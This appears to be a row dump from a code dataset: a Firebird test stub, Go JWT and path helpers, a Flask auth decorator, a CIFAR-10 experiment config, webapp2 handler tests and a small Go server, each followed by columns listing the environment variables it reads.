# #shutil.copy2( fdb, fdx )
#
# # Trying to move database to OFFLINE:
#
# runProgram('gfix',['-shut', 'full', '-force', '0', fdx])
#
# runProgram('gstat',['-h',fdx])
#
# # Trying to move database online using LOCAL protocol:
# runProgram('gfix',['-online',fdx])
#
# # gfix attachment via local protocol reflects with following lines in trace:
# # 2015-08-24T18:30:03.2580 (2516:012417E0) ATTACH_DATABASE
# # C:\\MIX\\FIREBIRD\\QA\\FBT-REPO\\TMP\\CORE4899-TMP.FDB (ATT_9, SYSDBA:NONE, NONE, <internal>)
#
# runProgram('gstat',['-h',fdx])
#
# if os.path.isfile(fdx):
# os.remove(fdx)
#
# # --------------------- II ---------------
#
# #shutil.copy2( fdb, fdx )
# runProgram('isql',['-q'],script)
#
# runProgram('gfix',['-shut', 'full', '-force', '0', fdx])
# runProgram('gstat',['-h',fdx])
#
# # Trying to move database online using REMOTE protocol:
# runProgram('gfix',['-online','localhost:'+fdx])
#
# # Note: gfix attachment via remote protocol refects with following lines in trace:
# # 2015-08-24T18:30:03.8520 (3256:01B526A8) ATTACH_DATABASE
# # C:\\MIX\\FIREBIRD\\QA\\FBT-REPO\\TMP\\CORE4899-TMP.FDB (ATT_9, SYSDBA:NONE, NONE, TCPv4:127.0.0.1)
# # C:\\MIX
# irebird
# b30\\gfix.exe:1448
#
# runProgram('gstat',['-h',fdx])
#
# if os.path.isfile(fdx):
# os.remove(fdx)
#
# #, 'substitutions':[('^((?!Attributes).)*$',''),('[\\s]+',' ')]
#
#
#---
#act_1 = python_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
Attributes force write, full shutdown
Attributes force write
Attributes force write, full shutdown
Attributes force write
"""
@pytest.mark.version('>=3.0')
@pytest.mark.xfail
def test_1(db_1):
pytest.fail("Test not IMPLEMENTED")
|
[] |
[] |
[
"ISC_USER",
"ISC_PASSWORD"
] |
[]
|
["ISC_USER", "ISC_PASSWORD"]
|
python
| 2 | 0 | |
auth/token.go
|
package auth
import (
"fmt"
"os"
"time"
"github.com/dgrijalva/jwt-go"
)
var jwtAudience = os.Getenv("OAUTH_AUDIENCE")
func validateToken(tokenString string) (*Auth, error) {
secretKey := os.Getenv("OAUTH_SECRET")
token, err := jwt.ParseWithClaims(tokenString, &jwtClaim{}, func(token *jwt.Token) (interface{}, error) {
return []byte(secretKey), nil
})
if err != nil {
return nil, fmt.Errorf("can not parse auth token: %w", err)
}
if !token.Valid {
return nil, fmt.Errorf("invalid token")
}
claim := token.Claims.(*jwtClaim)
err = claim.Valid()
if err != nil {
return nil, fmt.Errorf("invalid token: %w", err)
}
if !claim.VerifyAudience(jwtAudience, true) {
return nil, fmt.Errorf("invalid audience")
}
return &Auth{*claim}, nil
}
func createToken(claim *jwtClaim) (string, error) {
secretKey := os.Getenv("OAUTH_SECRET")
claim.ExpiresAt = time.Now().Add(1 * time.Hour).Unix()
claim.Audience = jwtAudience
token := jwt.NewWithClaims(jwt.SigningMethodHS256, claim)
return token.SignedString([]byte(secretKey))
}
|
[
"\"OAUTH_AUDIENCE\"",
"\"OAUTH_SECRET\"",
"\"OAUTH_SECRET\""
] |
[] |
[
"OAUTH_SECRET",
"OAUTH_AUDIENCE"
] |
[]
|
["OAUTH_SECRET", "OAUTH_AUDIENCE"]
|
go
| 2 | 0 | |
src/middleware.py
|
import os
from functools import wraps
import jwt
from flask import request
from src.response import jsonResponse
def tokenRequired(func):
"""
checks for token and decodes it
Args:
`func: (function)` -> function which needs token validated before access
Returns:
`function`
"""
@wraps(func)
def decoratedFunc(*args, **kwargs):
token = request.headers.get("x-auth-token", None)
if token is None:
return jsonResponse(status_code=401, error={"message": "token required"})
try:
decoded_token = jwt.decode(
jwt=token, key=os.getenv("tokenKey"), algorithms='HS256')
uid = decoded_token["uid"]
except Exception as e:
print(e)
return jsonResponse(status_code=500, error={"message": "something went wrong try again"})
return func(*args, **kwargs, uid=uid)
return decoratedFunc
|
[] |
[] |
[
"tokenKey"
] |
[]
|
["tokenKey"]
|
python
| 1 | 0 | |
internal/paths/paths.go
|
// Package paths is an internal package of twtr/cmd.
//
// It provides helpers to manipulate paths and directories.
package paths
import (
"errors"
"os"
"path/filepath"
"runtime"
"strings"
)
// tilde leader for ExpandTilde() and ContractTilde()
const tilde = "~/"
// ExpandTilde converts ~/path/to/file to /home/user/path/to/file.
func ExpandTilde(dir string) string {
// account for using tilde as a flat alias for $HOME
if dir == "~" {
dir += "/"
}
if home, err := os.UserHomeDir(); err == nil && strings.HasPrefix(dir, tilde) {
dir = filepath.Join(home, dir[len(tilde):])
}
return dir
}
// ContractTilde converts /home/user/path/to/file to ~/path/to/file.
func ContractTilde(dir string) string {
// get the user home dir and expand the tilde
if home, err := os.UserHomeDir(); err == nil && strings.HasPrefix(dir, home) {
dir = filepath.Join(tilde, dir[len(home):])
}
// account for using tilde as a flat alias for $HOME
if dir == "~" {
dir += "/"
}
return dir
}
// DataDir gets the XDG_DATA_DIR from the environment, with reasonable defaults
// for the current GOOS.
func DataDir() (dir string, err error) {
// get any XDG override value
if dir = os.Getenv("XDG_DATA_HOME"); dir != "" {
return
}
// get the home dir for later
if dir, err = os.UserHomeDir(); err != nil {
return
}
// determine the rest by GOOS
switch runtime.GOOS {
case "windows":
if dir = os.Getenv("LocalAppData"); dir == "" {
err = errors.New("%LOCALAPPDATA% is not defined")
}
case "darwin", "ios":
dir += "/Library/Application Support"
case "plan9":
dir += "/lib"
default: // to UNIX
dir += "/.local/share"
}
return
}
|
[
"\"XDG_DATA_HOME\"",
"\"LocalAppData\""
] |
[] |
[
"LocalAppData",
"XDG_DATA_HOME"
] |
[]
|
["LocalAppData", "XDG_DATA_HOME"]
|
go
| 2 | 0 | |
scifar10_exp/config_naive.py
|
import importlib
import os
from collections import OrderedDict
import numpy as np
from PIL import Image
from torchvision.transforms import transforms
model_config = OrderedDict([
('arch', 'lenet5'),
('n_classes', 10),
('input_shape', (3, 32, 32)),
])
data_config = OrderedDict([
('dataset', 'SplitCIFAR10'),
('valid', 0.0),
('num_workers', 4),
('train_transform', transforms.Compose([
lambda x: Image.fromarray(x.reshape((3, 32, 32)).transpose((1, 2, 0))),
transforms.ToTensor(),
transforms.Normalize(np.array([0.5]), np.array([0.5]))])),
('test_transform', transforms.Compose([
lambda x: Image.fromarray(x.reshape((3, 32, 32)).transpose((1, 2, 0))),
transforms.ToTensor(),
transforms.Normalize(np.array([0.5]), np.array([0.5]))
]))
])
run_config = OrderedDict([
('experiment', 'run'), # This configuration will be executed by run.py
('device', 'cuda'),
('tasks', [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9]]), # , [4, 5], [6, 7], [8, 9]
('seed', 1234),
])
log_config = OrderedDict([
('wandb', True),
('wandb_name', 'naive'),
('print', True),
('images', True), # Save the distilled images
])
param_config = OrderedDict([
('no_steps', 40), # Training epoch performed by the model on the distilled dataset
('steps', 'minibatch'), # epoch or minibatch('meta_lr', 0.1), # Learning rate for distilling images
('meta_lr', 0.1),
('model_lr', 0.05), # Base learning rate for the model
('lr_lr', 0.0), # Learning rate for the lrs of the model at each optimization step
('outer_steps', 0), # Distillation epochs
('inner_steps', 0), # Optimization steps of the model
('batch_size', 1024), # Minibatch size used during distillation
('distill_batch_size', 128),
('buffer_size', 0), # Number of examples per class kept in the buffer
])
config = OrderedDict([
('model_config', model_config),
('param_config', param_config),
('data_config', data_config),
('run_config', run_config),
('log_config', log_config),
])
if __name__ == '__main__':
os.environ['CUDA_VISIBLE_DEVICES'] = '3'
experiment = importlib.import_module(config['run_config']['experiment'])
experiment.run(config)
|
[] |
[] |
[
"CUDA_VISIBLE_DEVICES"
] |
[]
|
["CUDA_VISIBLE_DEVICES"]
|
python
| 1 | 0 | |
tests/handler_test.py
|
# -*- coding: utf-8 -*-
# Copyright 2011 webapp2 AUTHORS.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for webapp2 webapp2.RequestHandler
"""
import os
import sys
import unittest
from six.moves.urllib.parse import unquote_plus
from tests.test_base import BaseTestCase
import webapp2
try:
import mock
except ImportError:
from unittest import mock
class BareHandler(object):
def __init__(self, request, response):
self.response = response
response.write('I am not a RequestHandler but I work.')
def dispatch(self):
return self.response
class HomeHandler(webapp2.RequestHandler):
def get(self, **kwargs):
self.response.out.write('home sweet home')
def post(self, **kwargs):
self.response.out.write('home sweet home - POST')
class MethodsHandler(HomeHandler):
def put(self, **kwargs):
self.response.out.write('home sweet home - PUT')
def delete(self, **kwargs):
self.response.out.write('home sweet home - DELETE')
def head(self, **kwargs):
self.response.out.write('home sweet home - HEAD')
def trace(self, **kwargs):
self.response.out.write('home sweet home - TRACE')
def options(self, **kwargs):
self.response.out.write('home sweet home - OPTIONS')
class RedirectToHandler(webapp2.RequestHandler):
def get(self, **kwargs):
return self.redirect_to(
'route-test',
_fragment='my-anchor',
year='2010',
month='07',
name='test',
foo='bar'
)
class RedirectAbortHandler(webapp2.RequestHandler):
def get(self, **kwargs):
self.response.headers.add_header('Set-Cookie', 'a=b')
self.redirect('/somewhere', abort=True)
class BrokenHandler(webapp2.RequestHandler):
def get(self, **kwargs):
raise ValueError('booo!')
class BrokenButFixedHandler(BrokenHandler):
def handle_exception(self, exception, debug_mode):
# Let's fix it.
self.response.set_status(200)
self.response.out.write('that was close!')
def handle_404(request, response, exception):
response.out.write('404 custom handler')
response.set_status(404)
def handle_405(request, response, exception):
response.out.write('405 custom handler')
response.set_status(405, 'Custom Error Message')
response.headers['Allow'] = 'GET'
def handle_500(request, response, exception):
response.out.write('500 custom handler')
response.set_status(500)
class PositionalHandler(webapp2.RequestHandler):
def get(self, month, day, slug=None):
self.response.out.write('%s:%s:%s' % (month, day, slug))
class HandlerWithError(webapp2.RequestHandler):
def get(self, **kwargs):
self.response.out.write('bla bla bla bla bla bla')
self.error(403)
class InitializeHandler(webapp2.RequestHandler):
def __init__(self):
pass
def get(self):
self.response.out.write('Request method: %s' % self.request.method)
class WebDavHandler(webapp2.RequestHandler):
def version_control(self):
self.response.out.write('Method: VERSION-CONTROL')
def unlock(self):
self.response.out.write('Method: UNLOCK')
def propfind(self):
self.response.out.write('Method: PROPFIND')
class AuthorizationHandler(webapp2.RequestHandler):
def get(self):
self.response.out.write('nothing here')
class HandlerWithEscapedArg(webapp2.RequestHandler):
def get(self, name):
self.response.out.write(unquote_plus(name))
def get_redirect_url(handler, **kwargs):
return handler.uri_for('methods')
app = webapp2.WSGIApplication([
('/bare', BareHandler),
webapp2.Route('/', HomeHandler, name='home'),
webapp2.Route('/methods', MethodsHandler, name='methods'),
webapp2.Route('/broken', BrokenHandler),
webapp2.Route('/broken-but-fixed', BrokenButFixedHandler),
webapp2.Route('/<year:\d{4}>/<month:\d{1,2}>/<name>', None,
name='route-test'),
webapp2.Route('/<:\d\d>/<:\d{2}>/<:\w+>', PositionalHandler,
name='positional'),
webapp2.Route('/redirect-me', webapp2.RedirectHandler,
defaults={'_uri': '/broken'}),
webapp2.Route('/redirect-me2', webapp2.RedirectHandler,
defaults={'_uri': get_redirect_url}),
webapp2.Route('/redirect-me3', webapp2.RedirectHandler,
defaults={'_uri': '/broken', '_permanent': False}),
webapp2.Route('/redirect-me4', webapp2.RedirectHandler,
defaults={'_uri': get_redirect_url, '_permanent': False}),
webapp2.Route('/redirect-me5', RedirectToHandler),
webapp2.Route('/redirect-me6', RedirectAbortHandler),
webapp2.Route('/lazy', 'tests.resources.handlers.LazyHandler'),
webapp2.Route('/error', HandlerWithError),
webapp2.Route('/initialize', InitializeHandler),
webapp2.Route('/webdav', WebDavHandler),
webapp2.Route('/authorization', AuthorizationHandler),
webapp2.Route('/escape/<name:.*>', HandlerWithEscapedArg, 'escape'),
], debug=False)
DEFAULT_RESPONSE = """Status: 404 Not Found
content-type: text/html; charset=utf8
Content-Length: 52
404 Not Found
The resource could not be found.
"""
class TestHandler(BaseTestCase):
def tearDown(self):
super(TestHandler, self).tearDown()
app.error_handlers = {}
def test_200(self):
rsp = app.get_response('/')
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home')
def test_404(self):
req = webapp2.Request.blank('/nowhere')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 404)
def test_405(self):
req = webapp2.Request.blank('/')
req.method = 'PUT'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 405)
self.assertEqual(rsp.headers.get('Allow'), 'GET, POST')
def test_500(self):
req = webapp2.Request.blank('/broken')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 500)
def test_500_but_fixed(self):
req = webapp2.Request.blank('/broken-but-fixed')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'that was close!')
def test_501(self):
# 501 Not Implemented
req = webapp2.Request.blank('/methods')
req.method = 'FOOBAR'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 501)
def test_lazy_handler(self):
req = webapp2.Request.blank('/lazy')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'I am a laaazy view.')
def test_handler_with_error(self):
req = webapp2.Request.blank('/error')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 403)
self.assertEqual(rsp.body, b'')
def test_debug_mode(self):
app = webapp2.WSGIApplication([
webapp2.Route('/broken', BrokenHandler),
], debug=True)
req = webapp2.Request.blank('/broken')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 500)
def test_custom_error_handlers(self):
app.error_handlers = {
404: handle_404,
405: handle_405,
500: handle_500,
}
req = webapp2.Request.blank('/nowhere')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 404)
self.assertEqual(rsp.body, b'404 custom handler')
req = webapp2.Request.blank('/')
req.method = 'PUT'
rsp = req.get_response(app)
self.assertEqual(rsp.status, '405 Custom Error Message')
self.assertEqual(rsp.body, b'405 custom handler')
self.assertEqual(rsp.headers.get('Allow'), 'GET')
req = webapp2.Request.blank('/broken')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 500)
self.assertEqual(rsp.body, b'500 custom handler')
def test_methods(self):
app.debug = True
req = webapp2.Request.blank('/methods')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home')
req = webapp2.Request.blank('/methods')
req.method = 'POST'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home - POST')
req = webapp2.Request.blank('/methods')
req.method = 'PUT'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home - PUT')
req = webapp2.Request.blank('/methods')
req.method = 'DELETE'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home - DELETE')
req = webapp2.Request.blank('/methods')
req.method = 'HEAD'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'')
req = webapp2.Request.blank('/methods')
req.method = 'OPTIONS'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home - OPTIONS')
req = webapp2.Request.blank('/methods')
req.method = 'TRACE'
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'home sweet home - TRACE')
app.debug = False
def test_positional(self):
req = webapp2.Request.blank('/07/31/test')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'07:31:test')
req = webapp2.Request.blank('/10/18/wooohooo')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'10:18:wooohooo')
def test_redirect(self):
req = webapp2.Request.blank('/redirect-me')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 301)
self.assertEqual(rsp.body, b'')
self.assertEqual(rsp.headers['Location'], 'http://localhost/broken')
def test_redirect_with_callable(self):
req = webapp2.Request.blank('/redirect-me2')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 301)
self.assertEqual(rsp.body, b'')
self.assertEqual(rsp.headers['Location'], 'http://localhost/methods')
def test_redirect_not_permanent(self):
req = webapp2.Request.blank('/redirect-me3')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 302)
self.assertEqual(rsp.body, b'')
self.assertEqual(rsp.headers['Location'], 'http://localhost/broken')
def test_redirect_with_callable_not_permanent(self):
req = webapp2.Request.blank('/redirect-me4')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 302)
self.assertEqual(rsp.body, b'')
self.assertEqual(rsp.headers['Location'], 'http://localhost/methods')
def test_redirect_to(self):
req = webapp2.Request.blank('/redirect-me5')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 302)
self.assertEqual(rsp.body, b'')
self.assertEqual(
rsp.headers['Location'],
'http://localhost/2010/07/test?foo=bar#my-anchor'
)
def test_redirect_abort(self):
req = webapp2.Request.blank('/redirect-me6')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 302)
self.assertEqual(
rsp.body,
b"""302 Moved Temporarily\n\n"""
b"""The resource was found at http://localhost/somewhere; """
b"""you should be redirected automatically. """
)
self.assertEqual(rsp.headers['Location'], 'http://localhost/somewhere')
self.assertEqual(rsp.headers['Set-Cookie'], 'a=b')
def test_run(self):
os.environ['REQUEST_METHOD'] = 'GET'
with mock.patch('webapp2.handlers.sys.stdin') as patched_stdin:
with mock.patch('webapp2.handlers.sys.stdout') as patched_stdout:
patched_stdin.return_value = getattr(
sys.stdin,
'buffer',
sys.stdin
)
patched_stdout.return_value = getattr(
sys.stdout,
'buffer',
sys.stdout
)
app.run()
# self.assertEqual(sys.stdout.read(), DEFAULT_RESPONSE)
def test_run_bare(self):
os.environ['REQUEST_METHOD'] = 'GET'
with mock.patch('webapp2.handlers.sys.stdin') as patched_stdin:
with mock.patch('webapp2.handlers.sys.stdout') as patched_stdout:
patched_stdin.return_value = getattr(
sys.stdin,
'buffer',
sys.stdin
)
patched_stdout.return_value = getattr(
sys.stdout,
'buffer',
sys.stdout
)
app.run(bare=True)
# self.assertEqual(sys.stdout.read(), DEFAULT_RESPONSE)
def test_run_debug(self):
debug = app.debug
app.debug = True
os.environ['REQUEST_METHOD'] = 'GET'
os.environ['PATH_INFO'] = '/'
with mock.patch('webapp2.handlers.sys.stdin') as patched_stdin:
with mock.patch('webapp2.handlers.sys.stdout') as patched_stdout:
patched_stdin.return_value = getattr(
sys.stdin,
'buffer',
sys.stdin
)
patched_stdout.return_value = getattr(
sys.stdout,
'buffer',
sys.stdout
)
app.run(bare=True)
# self.assertEqual(sys.stdout.read(), DEFAULT_RESPONSE)
app.debug = debug
'''
def test_get_valid_methods(self):
req = webapp2.Request.blank('http://localhost:80/')
req.app = app
app.set_globals(app=app, request=req)
handler = BrokenHandler(req, None)
handler.app = app
self.assertEqual(handler.get_valid_methods().sort(), ['GET'].sort())
handler = HomeHandler(req, None)
handler.app = app
self.assertEqual(handler.get_valid_methods().sort(),
['GET', 'POST'].sort())
handler = MethodsHandler(req, None)
handler.app = app
query_methods = [
'GET', 'POST', 'HEAD', 'OPTIONS', 'PUT', 'DELETE', 'TRACE']
self.assertEqual(
handler.get_valid_methods().sort(),
query_methods.sort()
)
'''
def test_uri_for(self):
class Handler(webapp2.RequestHandler):
def get(self, *args, **kwargs):
pass
req = webapp2.Request.blank('http://localhost:80/')
req.route = webapp2.Route('')
req.route_args = tuple()
req.route_kwargs = {}
req.app = app
app.set_globals(app=app, request=req)
handler = Handler(req, webapp2.Response())
handler.app = app
for func in (handler.uri_for,):
self.assertEqual(func('home'), '/')
self.assertEqual(func('home', foo='bar'), '/?foo=bar')
self.assertEqual(func('home', _fragment='my-anchor', foo='bar'),
'/?foo=bar#my-anchor')
self.assertEqual(func('home', _fragment='my-anchor'),
'/#my-anchor')
self.assertEqual(func('home', _full=True),
'http://localhost:80/')
self.assertEqual(func('home', _full=True, _fragment='my-anchor'),
'http://localhost:80/#my-anchor')
self.assertEqual(func('home', _scheme='https'),
'https://localhost:80/')
self.assertEqual(func('home', _scheme='https', _full=False),
'https://localhost:80/')
self.assertEqual(func('home',
_scheme='https',
_fragment='my-anchor'),
'https://localhost:80/#my-anchor')
self.assertEqual(func('methods'), '/methods')
self.assertEqual(func('methods', foo='bar'), '/methods?foo=bar')
self.assertEqual(func('methods',
_fragment='my-anchor', foo='bar'),
'/methods?foo=bar#my-anchor')
self.assertEqual(
func('methods', _fragment='my-anchor'),
'/methods#my-anchor'
)
self.assertEqual(
func('methods', _full=True),
'http://localhost:80/methods'
)
self.assertEqual(
func('methods', _full=True, _fragment='my-anchor'),
'http://localhost:80/methods#my-anchor'
)
self.assertEqual(
func('methods', _scheme='https'),
'https://localhost:80/methods'
)
self.assertEqual(func('methods', _scheme='https', _full=False),
'https://localhost:80/methods')
self.assertEqual(
func('methods', _scheme='https', _fragment='my-anchor'),
'https://localhost:80/methods#my-anchor'
)
self.assertEqual(
func('route-test', year='2010', month='0', name='test'),
'/2010/0/test'
)
self.assertEqual(
func('route-test', year='2010', month='07', name='test'),
'/2010/07/test'
)
self.assertEqual(
func('route-test',
year='2010', month='07', name='test', foo='bar'),
'/2010/07/test?foo=bar'
)
self.assertEqual(
func('route-test',
_fragment='my-anchor',
year='2010',
month='07',
name='test',
foo='bar'),
'/2010/07/test?foo=bar#my-anchor'
)
self.assertEqual(
func('route-test',
_fragment='my-anchor',
year='2010',
month='07',
name='test'),
'/2010/07/test#my-anchor'
)
self.assertEqual(
func('route-test',
_full=True,
year='2010',
month='07',
name='test'),
'http://localhost:80/2010/07/test'
)
self.assertEqual(
func('route-test',
_full=True,
_fragment='my-anchor',
year='2010',
month='07',
name='test'),
'http://localhost:80/2010/07/test#my-anchor'
)
self.assertEqual(
func('route-test',
_scheme='https',
year='2010',
month='07',
name='test'),
'https://localhost:80/2010/07/test'
)
self.assertEqual(
func('route-test',
_scheme='https',
_full=False,
year='2010',
month='07',
name='test'),
'https://localhost:80/2010/07/test'
)
self.assertEqual(
func('route-test',
_scheme='https',
_fragment='my-anchor',
year='2010',
month='07',
name='test'),
'https://localhost:80/2010/07/test#my-anchor'
)
def test_extra_request_methods(self):
allowed_methods_backup = app.allowed_methods
webdav_methods = ('VERSION-CONTROL', 'UNLOCK', 'PROPFIND')
for method in webdav_methods:
# It is still not possible to use WebDav methods...
req = webapp2.Request.blank('/webdav')
req.method = method
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 501)
# Let's extend ALLOWED_METHODS with some WebDav methods.
app.allowed_methods = tuple(app.allowed_methods) + webdav_methods
# self.assertEqual(
# sorted(webapp2.get_valid_methods(WebDavHandler)),
# sorted(list(webdav_methods)))
# Now we can use WebDav methods...
for method in webdav_methods:
req = webapp2.Request.blank('/webdav')
req.method = method
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, webapp2._to_utf8('Method: %s' % method))
# Restore initial values.
app.allowed_methods = allowed_methods_backup
self.assertEqual(len(app.allowed_methods), 7)
def test_escaping(self):
def get_req(uri):
req = webapp2.Request.blank(uri)
app.set_globals(app=app, request=req)
handler = webapp2.RequestHandler(req, None)
handler.app = req.app = app
return req, handler
req, handler = get_req('http://localhost:80/')
uri = webapp2.uri_for('escape', name='with space')
req, handler = get_req(uri)
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'with space')
req, handler = get_req('http://localhost:80/')
uri = webapp2.uri_for('escape', name='with+plus')
req, handler = get_req(uri)
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'with plus')
req, handler = get_req('http://localhost:80/')
uri = webapp2.uri_for('escape', name='with/slash')
req, handler = get_req(uri)
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'with/slash')
def test_handle_exception_with_error(self):
class HomeHandler(webapp2.RequestHandler):
def get(self, **kwargs):
raise TypeError()
def handle_exception(request, response, exception):
raise ValueError()
app = webapp2.WSGIApplication([
webapp2.Route('/', HomeHandler, name='home'),
], debug=False)
app.error_handlers[500] = handle_exception
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 500)
def test_handle_exception_with_error_debug(self):
class HomeHandler(webapp2.RequestHandler):
def get(self, **kwargs):
raise TypeError()
def handle_exception(request, response, exception):
raise ValueError()
app = webapp2.WSGIApplication([
webapp2.Route('/', HomeHandler, name='home'),
], debug=True)
app.error_handlers[500] = handle_exception
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 500)
def test_function_handler(self):
def my_view(request, *args, **kwargs):
return webapp2.Response('Hello, function world!')
def other_view(request, *args, **kwargs):
return webapp2.Response('Hello again, function world!')
def one_more_view(request, *args, **kwargs):
self.assertEqual(args, ())
self.assertEqual(kwargs, {'foo': 'bar'})
return webapp2.Response('Hello you too!')
app = webapp2.WSGIApplication([
webapp2.Route('/', my_view),
webapp2.Route('/other', other_view),
webapp2.Route('/one-more/<foo>', one_more_view)
])
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello, function world!')
# Twice to test factory.
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello, function world!')
req = webapp2.Request.blank('/other')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello again, function world!')
# Twice to test factory.
req = webapp2.Request.blank('/other')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello again, function world!')
req = webapp2.Request.blank('/one-more/bar')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello you too!')
def test_custom_method(self):
class MyHandler(webapp2.RequestHandler):
def my_method(self):
self.response.out.write('Hello, custom method world!')
def my_other_method(self):
self.response.out.write('Hello again, custom method world!')
app = webapp2.WSGIApplication([
webapp2.Route('/', MyHandler, handler_method='my_method'),
webapp2.Route('/other', MyHandler,
handler_method='my_other_method'),
])
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello, custom method world!')
req = webapp2.Request.blank('/other')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello again, custom method world!')
def test_custom_method_with_string(self):
handler = 'tests.resources.handlers.CustomMethodHandler:custom_method'
app = webapp2.WSGIApplication([
webapp2.Route('/', handler=handler),
webapp2.Route('/bleh', handler=handler),
])
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'I am a custom method.')
req = webapp2.Request.blank('/bleh')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'I am a custom method.')
self.assertRaises(
ValueError, webapp2.Route, '/',
handler=handler,
handler_method='custom_method'
)
def test_factory_1(self):
app.debug = True
rsp = app.get_response('/bare')
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'I am not a RequestHandler but I work.')
app.debug = False
def test_factory_2(self):
"""Very crazy stuff. Please ignore it."""
class MyHandler(object):
def __init__(self, request, response):
self.request = request
self.response = response
def __new__(cls, *args, **kwargs):
return cls.create_instance(*args, **kwargs)()
@classmethod
def create_instance(cls, *args, **kwargs):
obj = object.__new__(cls)
if isinstance(obj, cls):
obj.__init__(*args, **kwargs)
return obj
def __call__(self):
return self
def dispatch(self):
self.response.write('hello')
app = webapp2.WSGIApplication([
webapp2.Route('/', handler=MyHandler),
])
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'hello')
def test_encoding(self):
class PostHandler(webapp2.RequestHandler):
def post(self):
foo = self.request.POST['foo']
if not foo:
foo = 'empty'
self.response.write(foo)
app = webapp2.WSGIApplication([
webapp2.Route('/', PostHandler),
], debug=True)
# foo with umlauts in the vowels.
value = b'f\xc3\xb6\xc3\xb6'
rsp = app.get_response(
'/',
POST={'foo': value},
headers=[('Content-Type',
'application/x-www-form-urlencoded; charset=utf-8')]
)
self.assertEqual(rsp.unicode_body, u'föö')
self.assertEqual(rsp.body, value)
rsp = app.get_response(
'/',
POST={'foo': value},
headers=[('Content-Type', 'application/x-www-form-urlencoded')]
)
self.assertEqual(rsp.unicode_body, u'föö')
self.assertEqual(rsp.body, value)
if __name__ == '__main__':
unittest.main()
|
[] |
[] |
[
"PATH_INFO",
"REQUEST_METHOD"
] |
[]
|
["PATH_INFO", "REQUEST_METHOD"]
|
python
| 2 | 0 | |
cmd/main.go
|
package main
import (
"log"
"net/http"
"os"
"github.com/tgmendes/go4dummies/cmd/handlers"
)
func main() {
APIKey := os.Getenv("API_KEY")
Host := os.Getenv("HOST")
oh := handlers.OrderHandler{
EatStreetAPIKey: APIKey,
EatStreetHost: Host,
}
log.Println("starting server")
http.Handle("/api/orders", oh) // HL
http.HandleFunc("/api/restaurants/crawl", handlers.CrawlYelp) // HL
http.ListenAndServe(":8080", nil) // HL
}
|
[
"\"API_KEY\"",
"\"HOST\""
] |
[] |
[
"API_KEY",
"HOST"
] |
[]
|
["API_KEY", "HOST"]
|
go
| 2 | 0 | |
